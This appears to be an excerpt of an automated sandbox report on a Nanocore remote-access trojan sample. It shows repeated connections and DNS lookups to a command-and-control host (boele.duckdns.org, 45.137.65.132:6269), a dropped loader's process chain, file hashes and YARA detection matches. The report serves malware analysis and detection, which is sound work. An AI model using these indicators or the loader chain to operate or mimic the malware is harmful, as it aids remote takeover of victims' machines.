                    Feb 1, 2023 05:15:47.346196890 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:47.348155975 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:47.394399881 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:47.422895908 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:47.423243999 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:47.452347040 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:47.452456951 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:47.480977058 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:47.534977913 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:47.668217897 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:47.752978086 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:47.833462000 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:51.970927954 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:51.999241114 CET62694973945.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:52.002324104 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:52.002890110 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:52.038940907 CET62694973945.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:52.082504988 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:52.110529900 CET62694973945.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:52.114322901 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:52.142944098 CET62694973945.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:52.161133051 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:52.253382921 CET62694973945.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:52.364660025 CET62694973945.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:52.373853922 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:52.455296040 CET62694973945.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:52.459098101 CET62694973945.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:52.504198074 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:52.533510923 CET62694973945.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:52.536544085 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:52.565149069 CET62694973945.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:52.566333055 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:52.595242023 CET62694973945.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:52.644893885 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:52.895981073 CET497396269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.038820028 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.068475008 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.068681002 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.069291115 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.113635063 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.160752058 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.188782930 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.190850973 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.219439030 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.270203114 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.276398897 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.361577034 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.487742901 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.535881996 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.550477982 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.564245939 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.616705894 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.627264977 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.681627035 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.723319054 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.751183987 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.751463890 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.779663086 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.779846907 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.862087965 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.862166882 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.886301041 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.926496029 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.953556061 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:57.955291986 CET62694974045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:57.955358028 CET497406269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.106442928 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.135752916 CET62694974145.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:02.135910034 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.136301041 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.171075106 CET62694974145.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:02.177769899 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.206182957 CET62694974145.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:02.206506968 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.235779047 CET62694974145.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:02.254245996 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.330421925 CET62694974145.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:02.456702948 CET62694974145.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:02.457607031 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.528565884 CET62694974145.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:02.583199024 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.615827084 CET62694974145.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:02.616213083 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.646568060 CET62694974145.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:02.646712065 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.675715923 CET62694974145.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:02.675854921 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:02.755244017 CET62694974145.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:03.178155899 CET497416269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:07.232049942 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:07.260343075 CET62694974345.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:07.260548115 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:07.261295080 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:07.296876907 CET62694974345.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:07.349163055 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:07.377193928 CET62694974345.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:07.379885912 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:07.408337116 CET62694974345.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:07.420527935 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:07.502232075 CET62694974345.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:07.628839016 CET62694974345.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:07.636497974 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:07.720779896 CET62694974345.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:07.722454071 CET62694974345.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:07.771114111 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:07.801147938 CET62694974345.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:07.802898884 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:07.831039906 CET62694974345.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:07.831758022 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:07.860245943 CET62694974345.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:07.911803961 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:08.258975983 CET497436269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:12.308047056 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:12.337589025 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:12.337899923 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:12.338382006 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:12.373893023 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:12.427793980 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:12.456845999 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:12.457576036 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:12.486340046 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:12.509428978 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:12.596287966 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:12.725421906 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:12.726578951 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:12.799280882 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:12.826733112 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:12.880907059 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:12.909993887 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:12.959036112 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:14.925112963 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:14.974847078 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:17.379086018 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:17.428111076 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:17.466379881 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:17.495929956 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:17.496016979 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:17.524688005 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:17.568799019 CET497446269192.168.2.745.137.65.132
                    Feb 1, 2023 05:16:22.394490004 CET62694974445.137.65.132192.168.2.7
                    Feb 1, 2023 05:16:22.444320917 CET497446269192.168.2.745.137.65.132
                    TimestampSource PortDest PortSource IPDest IP
                    Feb 1, 2023 05:14:18.041230917 CET6032653192.168.2.78.8.8.8
                    Feb 1, 2023 05:14:18.148085117 CET53603268.8.8.8192.168.2.7
                    Feb 1, 2023 05:14:24.836009026 CET5050553192.168.2.78.8.8.8
                    Feb 1, 2023 05:14:24.942651033 CET53505058.8.8.8192.168.2.7
                    Feb 1, 2023 05:14:34.243309021 CET6392653192.168.2.78.8.8.8
                    Feb 1, 2023 05:14:34.261714935 CET53639268.8.8.8192.168.2.7
                    Feb 1, 2023 05:14:40.269475937 CET5100753192.168.2.78.8.8.8
                    Feb 1, 2023 05:14:40.287024021 CET53510078.8.8.8192.168.2.7
                    Feb 1, 2023 05:14:46.528229952 CET5051353192.168.2.78.8.8.8
                    Feb 1, 2023 05:14:46.639312983 CET53505138.8.8.8192.168.2.7
                    Feb 1, 2023 05:14:51.513125896 CET6076553192.168.2.78.8.8.8
                    Feb 1, 2023 05:14:51.619739056 CET53607658.8.8.8192.168.2.7
                    Feb 1, 2023 05:14:56.473234892 CET4951653192.168.2.78.8.8.8
                    Feb 1, 2023 05:14:56.494921923 CET53495168.8.8.8192.168.2.7
                    Feb 1, 2023 05:15:01.467236996 CET6267953192.168.2.78.8.8.8
                    Feb 1, 2023 05:15:01.485101938 CET53626798.8.8.8192.168.2.7
                    Feb 1, 2023 05:15:08.577121973 CET5210453192.168.2.78.8.8.8
                    Feb 1, 2023 05:15:08.594609022 CET53521048.8.8.8192.168.2.7
                    Feb 1, 2023 05:15:14.614614964 CET6535653192.168.2.78.8.8.8
                    Feb 1, 2023 05:15:14.723148108 CET53653568.8.8.8192.168.2.7
                    Feb 1, 2023 05:15:19.982728004 CET5152653192.168.2.78.8.8.8
                    Feb 1, 2023 05:15:20.000329971 CET53515268.8.8.8192.168.2.7
                    Feb 1, 2023 05:15:27.687212944 CET5113953192.168.2.78.8.8.8
                    Feb 1, 2023 05:15:27.795356035 CET53511398.8.8.8192.168.2.7
                    Feb 1, 2023 05:15:33.710380077 CET5878453192.168.2.78.8.8.8
                    Feb 1, 2023 05:15:33.729927063 CET53587848.8.8.8192.168.2.7
                    Feb 1, 2023 05:15:38.864883900 CET6460853192.168.2.78.8.8.8
                    Feb 1, 2023 05:15:38.973797083 CET53646088.8.8.8192.168.2.7
                    Feb 1, 2023 05:15:46.845508099 CET5874653192.168.2.78.8.8.8
                    Feb 1, 2023 05:15:46.863115072 CET53587468.8.8.8192.168.2.7
                    Feb 1, 2023 05:15:51.864135027 CET6243353192.168.2.78.8.8.8
                    Feb 1, 2023 05:15:51.969964027 CET53624338.8.8.8192.168.2.7
                    Feb 1, 2023 05:15:56.930159092 CET6124853192.168.2.78.8.8.8
                    Feb 1, 2023 05:15:57.037552118 CET53612488.8.8.8192.168.2.7
                    Feb 1, 2023 05:16:02.088044882 CET5275053192.168.2.78.8.8.8
                    Feb 1, 2023 05:16:02.105552912 CET53527508.8.8.8192.168.2.7
                    Feb 1, 2023 05:16:07.212547064 CET5023153192.168.2.78.8.8.8
                    Feb 1, 2023 05:16:07.229955912 CET53502318.8.8.8192.168.2.7
                    Feb 1, 2023 05:16:12.287746906 CET5851453192.168.2.78.8.8.8
                    Feb 1, 2023 05:16:12.305541992 CET53585148.8.8.8192.168.2.7
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Feb 1, 2023 05:14:18.041230917 CET192.168.2.78.8.8.80xfcdStandard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:24.836009026 CET192.168.2.78.8.8.80xbdf7Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:34.243309021 CET192.168.2.78.8.8.80xded4Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:40.269475937 CET192.168.2.78.8.8.80x5981Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:46.528229952 CET192.168.2.78.8.8.80x7e10Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:51.513125896 CET192.168.2.78.8.8.80xe48fStandard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:56.473234892 CET192.168.2.78.8.8.80xcf85Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:01.467236996 CET192.168.2.78.8.8.80x2e4bStandard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:08.577121973 CET192.168.2.78.8.8.80xf2bbStandard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:14.614614964 CET192.168.2.78.8.8.80xd1c5Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:19.982728004 CET192.168.2.78.8.8.80xd2a7Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:27.687212944 CET192.168.2.78.8.8.80xb850Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:33.710380077 CET192.168.2.78.8.8.80xff55Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:38.864883900 CET192.168.2.78.8.8.80x4880Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:46.845508099 CET192.168.2.78.8.8.80xc045Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:51.864135027 CET192.168.2.78.8.8.80x6400Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:56.930159092 CET192.168.2.78.8.8.80x9958Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:16:02.088044882 CET192.168.2.78.8.8.80x39d0Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:16:07.212547064 CET192.168.2.78.8.8.80xb515Standard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    Feb 1, 2023 05:16:12.287746906 CET192.168.2.78.8.8.80x7d2eStandard query (0)boele.duckdns.orgA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Feb 1, 2023 05:14:18.148085117 CET8.8.8.8192.168.2.70xfcdNo error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:24.942651033 CET8.8.8.8192.168.2.70xbdf7No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:34.261714935 CET8.8.8.8192.168.2.70xded4No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:40.287024021 CET8.8.8.8192.168.2.70x5981No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:46.639312983 CET8.8.8.8192.168.2.70x7e10No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:51.619739056 CET8.8.8.8192.168.2.70xe48fNo error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:14:56.494921923 CET8.8.8.8192.168.2.70xcf85No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:01.485101938 CET8.8.8.8192.168.2.70x2e4bNo error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:08.594609022 CET8.8.8.8192.168.2.70xf2bbNo error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:14.723148108 CET8.8.8.8192.168.2.70xd1c5No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:20.000329971 CET8.8.8.8192.168.2.70xd2a7No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:27.795356035 CET8.8.8.8192.168.2.70xb850No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:33.729927063 CET8.8.8.8192.168.2.70xff55No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:38.973797083 CET8.8.8.8192.168.2.70x4880No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:46.863115072 CET8.8.8.8192.168.2.70xc045No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:51.969964027 CET8.8.8.8192.168.2.70x6400No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:15:57.037552118 CET8.8.8.8192.168.2.70x9958No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:16:02.105552912 CET8.8.8.8192.168.2.70x39d0No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:16:07.229955912 CET8.8.8.8192.168.2.70xb515No error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false
                    Feb 1, 2023 05:16:12.305541992 CET8.8.8.8192.168.2.70x7d2eNo error (0)boele.duckdns.org45.137.65.132A (IP address)IN (0x0001)false

                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:05:14:08
                    Start date:01/02/2023
                    Path:C:\Users\user\Desktop\fyTwP4SHWF.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\fyTwP4SHWF.exe
                    Imagebase:0x400000
                    File size:430029 bytes
                    MD5 hash:D3E933B0AAB571BDC73355A106D657E0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Target ID:1
                    Start time:05:14:09
                    Start date:01/02/2023
                    Path:C:\Users\user\AppData\Local\Temp\rnixgfly.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt
                    Imagebase:0x400000
                    File size:76800 bytes
                    MD5 hash:C1DC97853E14C21B463C6E95B21C300C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 10%, ReversingLabs
                    Reputation:low

                    Target ID:2
                    Start time:05:14:10
                    Start date:01/02/2023
                    Path:C:\Users\user\AppData\Local\Temp\rnixgfly.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe
                    Imagebase:0x400000
                    File size:76800 bytes
                    MD5 hash:C1DC97853E14C21B463C6E95B21C300C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.503941570.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.503941570.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
